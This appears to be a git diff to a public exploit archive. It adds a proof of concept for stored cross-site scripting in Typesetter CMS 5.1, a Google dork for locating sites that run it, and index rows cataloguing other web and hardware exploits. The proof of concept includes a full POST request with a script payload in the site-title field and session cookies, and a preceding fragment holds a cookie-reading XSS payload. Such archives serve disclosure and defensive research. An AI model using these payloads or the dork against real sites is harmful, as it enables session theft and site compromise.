+Content > Content Manager > Edit some page > Logic (tab) > Page Specific Metadata (text field)
+Content > Content Manager > Edit some page > Logic (tab) > Smart data or logic that is specific to this page (text field)
+
+
+3: Example payload:
+----------------------
+<script>alert(document.cookie);</script>
+
+
+4: Exploitation demo:
+----------------------
+youtube.com/watch?v=M6D7DmmjLak&t=22s
\ No newline at end of file
diff --git a/exploits/php/webapps/48852.txt b/exploits/php/webapps/48852.txt
new file mode 100644
index 000000000..47c9751be
--- /dev/null
+++ b/exploits/php/webapps/48852.txt
@@ -0,0 +1,43 @@
+# Exploit Title: Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting
+# Exploit Author: Alperen Ergel
+# Web Site: https://alperenae.gitbook.io/
+# Contact: @alperen_ae (IG) @alpren_ae (TW)
+# Software Homepage: https://www.typesettercms.com/
+# Version : 5.1
+# Tested on: windows 10 / xammp
+# Category: WebApp
+# Google Dork: intext:"Powered by Typesetter"
+# Date: 2020-09-29
+# CVE :-
+######## Description ########
+#
+# 1-) Loggin administrator page
+#  
+# 2-) Edit under Settings > Configration >  General Settings > title and add payload
+#
+# 3-) Back to web site then will be work payload
+#
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+POST /typesetter/Admin/Configuration HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/typesetter/Admin/Configuration
+
+Content-Type: application/x-www-form-urlencoded
+
+Content-Length: 1134
+Connection: close
+Cookie: g=2; gpEasy_bf7bf352c176=zM0WimE3PVwK7QeQaaK88BgSGnOYXfD7d5y7K815; __gads=ID=6078ee5aea85c9aa:T=1600515511:S=ALNI_MaaxxD3-kKm1mS0BDTLxQUBoD-1bw; _ga=GA1.2.862675868.1600515711; __atuvc=3%7C38%2C1%7C39%2C3%7C40; wires_challenge=afzBq%2FHPKhRGhabSML1Jc738JzKxfr4w; _gid=GA1.2.50322462.1601402080
+
+Upgrade-Insecure-Requests: 1
+
+verified=1fe7b252b3aa6f0a3ef412e4d9556f34bce5d15f0433057805e74c41305a2cab2641a4ec81988341275dab33e5f92e8ebd3cf70766f8b9718f835d1e4f5ec78d
+&title=%3Cscript%3Ealert%28%22THIS+IS+XSS+PAYLOAD%22%29%3B%3C%2Fscript%3E&keywords=&desc=&aaa=Save+%28All%29&colorbox_style=example1&gallery_legacy_style=false&language=en&langeditor=inherit&showsitemap=false&showsitemap=true&showlogin=false&showlogin=true
+&showgplink=false&showgplink=true&maximgarea=2073600&resize_images=false&resize_images=true&preserve_icc_profiles=false&preserve_icc_profiles=true&preserve_image_metadata=false&preserve_image_metadata=true&maxthumbsize=300&maxthumbheight=&thumbskeepaspect=false&auto_redir=90&history_limit=30&HTML_Tidy=&Report_Errors=false&combinejs=false&combinejs=true&combinecss=false&combinecss=true&etag_headers=false&etag_headers=true&space_char=-&toemail=cms%40gfdk.org&toname=dsadasda&from_address=AutomatedSender%40localhost&from_name=Automated+Sender&from_use_user=false&require_email=&mail_method=mail&sendmail_path=&smtp_hosts=&smtp_user=&smtp_pass=&recaptcha_public=&recaptcha_private=&recaptcha_language=inherit&cmd=save_config
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a7e3567d3..393b523c2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -17821,6 +17821,7 @@ id,file,description,date,author,type,platform,port
 42790,exploits/linux/remote/42790.txt,"Tiny HTTPd 0.1.0 - Directory Traversal",2017-09-26,"Touhid M.Shaikh",remote,linux,
 42793,exploits/multiple/remote/42793.rb,"NodeJS Debugger - Command Injection (Metasploit)",2017-09-26,Metasploit,remote,multiple,5858
 48816,exploits/windows/remote/48816.py,"Microsoft SQL Server Reporting Services 2016 - Remote Code Execution",2020-09-17,"West Shepherd",remote,windows,
+48842,exploits/hardware/remote/48842.py,"Sony IPELA Network Camera 1.82.01 - 'ftpclient.cgi' Remote Stack Buffer Overflow",2020-10-01,LiquidWorm,remote,hardware,
 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java,
 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware,
 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows,
@@ -40664,6 +40665,16 @@ id,file,description,date,author,type,platform,port
 48835,exploits/hardware/webapps/48835.py,"Mida eFramework 2.8.9 - Remote Code Execution",2020-09-28,elbae,webapps,hardware,
 48837,exploits/multiple/webapps/48837.txt,"Joplin 1.0.245 - Arbitrary Code Execution (PoC)",2020-09-28,"Ademar Nowasky Junior",webapps,multiple,
 48838,exploits/php/webapps/48838.py,"WebsiteBaker 2.12.2 - Remote Code Execution",2020-09-29,Enesdex,webapps,php,
+48843,exploits/hardware/webapps/48843.txt,"BrightSign Digital Signage Diagnostic Web Server 8.2.26 - Server-Side Request Forgery (Unauthenticated)",2020-10-01,LiquidWorm,webapps,hardware,
+48844,exploits/hardware/webapps/48844.txt,"BrightSign Digital Signage Diagnostic Web Server 8.2.26 - File Delete Path Traversal",2020-10-01,LiquidWorm,webapps,hardware,
+48845,exploits/hardware/webapps/48845.txt,"SpinetiX Fusion Digital Signage 3.4.8 - Database Backup Disclosure",2020-10-01,LiquidWorm,webapps,hardware,
+48846,exploits/hardware/webapps/48846.txt,"SpinetiX Fusion Digital Signage 3.4.8 - Cross-Site Request Forgery (Add Admin)",2020-10-01,LiquidWorm,webapps,hardware,
+48847,exploits/hardware/webapps/48847.txt,"SpinetiX Fusion Digital Signage 3.4.8 - Username Enumeration",2020-10-01,LiquidWorm,webapps,hardware,
+48848,exploits/php/webapps/48848.txt,"MonoCMS Blog 1.0 - Arbitrary File Deletion (Authenticated)",2020-10-01,"Shahrukh Iqbal Mirza",webapps,php,
+48849,exploits/php/webapps/48849.txt,"WebsiteBaker 2.12.2 - 'display_name' SQL Injection (authenticated)",2020-10-01,"Roel van Beurden",webapps,php,
+48850,exploits/php/webapps/48850.txt,"GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting (Authenticated)",2020-10-01,"Roel van Beurden",webapps,php,
+48851,exploits/php/webapps/48851.txt,"CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated)",2020-10-01,"Roel van Beurden",webapps,php,
+48852,exploits/php/webapps/48852.txt,"Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting",2020-10-01,"Alperen Ergel",webapps,php,
 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,
@@ -42979,6 +42990,7 @@ id,file,description,date,author,type,platform,port
 48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,
 48652,exploits/hardware/webapps/48652.txt,"SuperMicro IPMI 03.40 - Cross-Site Request Forgery (Add Admin)",2020-07-08,"Metin Yunus Kandemir",webapps,hardware,
 48653,exploits/hardware/webapps/48653.txt,"BSA Radar 1.6.7234.24750 - Cross-Site Request Forgery (Change Password)",2020-07-08,"William Summerhill",webapps,hardware,
+48654,exploits/java/webapps/48654.txt,"Exhibitor Web UI 1.7.1 - Remote Code Execution",2020-07-07,"Logan Sanderson",webapps,java,
 48655,exploits/php/webapps/48655.php,"PHP 7.4 FFI - 'disable_functions' Bypass",2020-07-07,"hunter gregal",webapps,php,
 48656,exploits/php/webapps/48656.txt,"Wordpress Plugin Powie's WHOIS Domain Check 0.9.31 - Persistent Cross-Site Scripting",2020-07-09,mqt,webapps,php,
 48659,exploits/asp/webapps/48659.txt,"HelloWeb 2.0 - Arbitrary File Download",2020-07-10,bRpsd,webapps,asp,